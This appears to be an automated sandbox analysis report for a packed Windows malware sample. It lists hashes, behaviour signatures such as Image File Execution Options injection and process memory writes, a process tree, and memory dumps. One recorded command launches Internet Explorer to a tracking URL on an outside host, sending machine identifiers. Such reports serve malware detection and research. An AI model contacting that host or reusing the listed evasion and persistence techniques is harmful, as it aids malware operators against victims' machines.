Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 01:09

General

  • Target

    9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe

  • Size

    256KB

  • MD5

    9efad46c3e0b1db3fa7ed20c2a1e1363

  • SHA1

    ba6c77e60584b33746fbdf99e8a2899f5ba1f28f

  • SHA256

    1e26f05d3c3ffe7152ced679bac4d6583d86f525dc8b4c2f58683dd5f65368fa

  • SHA512

    273bbd9d989254cecf9c010475cf8ad260f1ee358c23c8df61e7f3b3947a824c4172471e165a71441ad0edff1961d54247e67918118cd4c99a10029a690e5106

  • SSDEEP

    6144:8+yFV0bgy2rM/kvt15RHxhZFtfaPNSfo/qPoPp:Ky2Q8V15VLccQ/qPox

Malware Config

Signatures

  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
  • VMProtect packed file 9 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Enumerates connected drives 3 TTPs 20 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1572
    • C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"
      2⤵
      • Modifies visiblity of hidden/system files in Explorer
      • Event Triggered Execution: Image File Execution Options Injection
      • Enumerates connected drives
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2356
    • C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4464
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://tongji.maxjust555.cn/avastcnzztj/dddxxx.htm?mac=633467663&os=windowsXP&ver=20090323&id=674715074
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2352
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2352 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1800

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    471B

    MD5

    a6dfcf513cd338ab2640f399e560ba31

    SHA1

    cbc6ea36eef4c8e6e8524b2aa220b9c0017a9145

    SHA256

    fac20d9c0f5375b23b8932cb8ecb0839245962b4b2cd91924cfc0d9206e4fabf

    SHA512

    7b2dc6f8ac8fc1503caa508e8efb767a99448c35ab4714c46c034536b4b7b9067b2bf3170798130fe5a9d2763f38308aba868ca301791d0abf60e169d17acd12

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    404B

    MD5

    ece8e920eaa5719becace852bcfb7679

    SHA1

    c1b6922821a4c44aa1738059a7f0d8311a497c86

    SHA256

    84abfe3f443f4513859fccd347003e6bcdadb1f29d5ef5fafd265a3a23c56b55

    SHA512

    640e6ad40600aa01d53eb5e31f0a46daaa2d80ed24c8f6b3c67500dd763af5017a7ad081839b2d58e7b85e57db090f0f16b7d5e760b34420db2c813b8851d136

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FMGLWGAG\suggestions[1].en-US

    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • memory/1572-96-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-1-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-8-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-7-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-9-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-12-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-2-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-43-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-4-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-6-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-81-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-66-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-57-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-54-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-24-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-27-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/1572-25-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/2356-16-0x0000000000400000-0x0000000000425B4E-memory.dmp

    Filesize

    150KB

  • memory/2356-47-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2356-13-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2356-14-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2356-21-0x0000000000400000-0x0000000000425B4E-memory.dmp

    Filesize

    150KB

  • memory/2356-19-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2356-82-0x0000000000400000-0x0000000000425B4E-memory.dmp

    Filesize

    150KB

  • memory/2356-18-0x000000000041C000-0x0000000000426000-memory.dmp

    Filesize

    40KB

  • memory/2356-44-0x0000000000400000-0x0000000000425B4E-memory.dmp

    Filesize

    150KB

  • memory/2356-80-0x0000000000400000-0x0000000000425B4E-memory.dmp

    Filesize

    150KB

  • memory/2356-17-0x000000000041C000-0x0000000000426000-memory.dmp

    Filesize

    40KB

  • memory/2356-51-0x0000000000400000-0x0000000000425B4E-memory.dmp

    Filesize

    150KB

  • memory/2692-45-0x0000000000400000-0x0000000000492000-memory.dmp

    Filesize

    584KB

  • memory/2692-23-0x0000000000400000-0x0000000000492000-memory.dmp

    Filesize

    584KB

  • memory/2692-0-0x0000000000400000-0x0000000000492000-memory.dmp

    Filesize

    584KB

  • memory/4464-37-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

  • memory/4464-70-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

  • memory/4464-52-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

  • memory/4464-28-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

  • memory/4464-33-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

  • memory/4464-40-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

  • memory/4464-36-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

  • memory/4464-30-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

  • memory/4464-32-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB